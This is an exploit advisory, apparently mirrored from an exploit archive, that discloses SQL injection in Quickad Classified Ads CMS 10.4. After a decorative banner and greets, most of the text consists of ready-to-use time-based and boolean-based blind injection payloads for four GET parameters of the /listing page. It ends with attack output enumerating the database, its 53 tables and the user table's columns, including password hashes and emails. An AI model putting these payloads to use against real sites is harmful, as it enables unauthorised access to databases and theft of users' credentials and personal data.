Share
## https://sploitus.com/exploit?id=PACKETSTORM:172957
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”‚โ”‚ C r a C k E r โ”Œโ”˜  
โ”Œโ”˜ T H E C R A C K O F E T E R N A L M I G H T โ”‚โ”‚  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
  
โ”Œโ”€โ”€โ”€โ”€ From The Ashes and Dust Rises An Unimaginable crack.... โ”€โ”€โ”€โ”€โ”  
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”Œโ”˜ [ Vulnerability ] โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
: Author : CraCkEr :  
โ”‚ Website : https://bylancer.com/ โ”‚  
โ”‚ Vendor : Bylancer โ”‚  
โ”‚ Software : Quickad Classified Ads CMS 10.4 โ”‚  
โ”‚ Vuln Type: SQL Injection โ”‚  
โ”‚ Impact : Database Access โ”‚  
โ”‚ โ”‚  
โ”‚โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”‚  
โ”‚ โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
: :  
โ”‚ Release Notes: โ”‚  
โ”‚ โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ”‚  
โ”‚ โ”‚  
โ”‚ SQL injection attacks can allow unauthorized access to sensitive data, modification of โ”‚  
โ”‚ data and crash the application or make it unavailable, leading to lost revenue and โ”‚  
โ”‚ damage to a company's reputation. โ”‚  
โ”‚ โ”‚  
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”Œโ”˜ โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
โ”Œโ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  
โ”Œโ”˜ ยฉ CraCkEr 2023 โ”Œโ”˜  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”˜  
  
Path: /listing  
  
https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat=  
https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI]  
  
  
GET parameter 'range1' is vulnerable to SQL Injection  
  
---  
Parameter: range1 (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1  
---  
  
GET parameter 'range2' is vulnerable to SQL Injection  
  
---  
Parameter: range2 (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy  
---  
  
GET parameter 'placeid' is vulnerable to SQL Injection  
  
---  
Parameter: placeid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat=  
---  
  
GET parameter 'keywords' is vulnerable to SQL Injection  
  
---  
Parameter: keywords (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1  
---  
  
  
[+] Starting the Attack  
  
fetching current database  
current database: 'classified_******'  
  
  
fetching tables  
  
[53 tables]  
+---------------------------+  
| ad_custom_fields |  
| ad_product |  
| pro_admins |  
| pro_adsense |  
| pro_balance |  
| pro_blog |  
| pro_blog_cat_relation |  
| pro_blog_categories |  
| pro_blog_comment |  
| pro_catagory_main |  
| pro_catagory_sub |  
| pro_category_translation |  
| pro_cities |  
| pro_countries |  
| pro_currencies |  
| pro_custom_data |  
| pro_custom_fields |  
| pro_custom_options |  
| pro_emailq |  
| pro_faq_entries |  
| pro_favads |  
| pro_firebase_device_token |  
| pro_languages |  
| pro_login_attempts |  
| pro_logs |  
| pro_messages |  
| pro_mobile_numbers |  
| pro_notification |  
| pro_options |  
| pro_pages |  
| pro_payments |  
| pro_plan_options |  
| pro_plans |  
| pro_product |  
| pro_product_resubmit |  
| pro_push_notification |  
| pro_qbm_banners |  
| pro_qbm_log |  
| pro_qbm_options |  
| pro_qbm_transactions |  
| pro_qbm_types |  
| pro_reviews |  
| pro_subadmin1 |  
| pro_subadmin2 |  
| pro_subscriptions |  
| pro_taxes |  
| pro_testimonials |  
| pro_time_zones |  
| pro_transaction |  
| pro_upgrades |  
| pro_user |  
| pro_user_options |  
| pro_usergroups |  
+---------------------------+  
  
  
fetching columns from Table 'pro_user'  
  
[36 columns]  
+----------------+----------------------------------------+  
| Column | Type |  
+----------------+----------------------------------------+  
| description | text |  
| name | varchar(225) |  
| status | enum('0','1','2') |  
| view | int(11) |  
| address | varchar(255) |  
| city | varchar(225) |  
| confirm | varchar(255) |  
| country | varchar(50) |  
| created_at | datetime |  
| email | varchar(255) |  
| facebook | varchar(255) |  
| forgot | varchar(255) |  
| googleplus | varchar(255) |  
| group_id | int(11) |  
| id | int(11) |  
| image | varchar(225) |  
| instagram | varchar(255) |  
| lastactive | datetime |  
| linkedin | varchar(255) |  
| notify | enum('0','1') |  
| notify_cat | varchar(255) |  
| oauth_link | varchar(255) |  
| oauth_provider | enum('','facebook','google','twitter') |  
| oauth_uid | varchar(100) |  
| online | enum('0','1') |  
| password_hash | varchar(255) |  
| phone | varchar(255) |  
| postcode | varchar(255) |  
| sex | enum('Male','Female','Other') |  
| tagline | varchar(255) |  
| twitter | varchar(255) |  
| updated_at | datetime |  
| user_type | enum('user','seller') |  
| username | varchar(255) |  
| website | varchar(255) |  
| youtube | varchar(255) |  
+----------------+----------------------------------------+  
  
  
[-] Done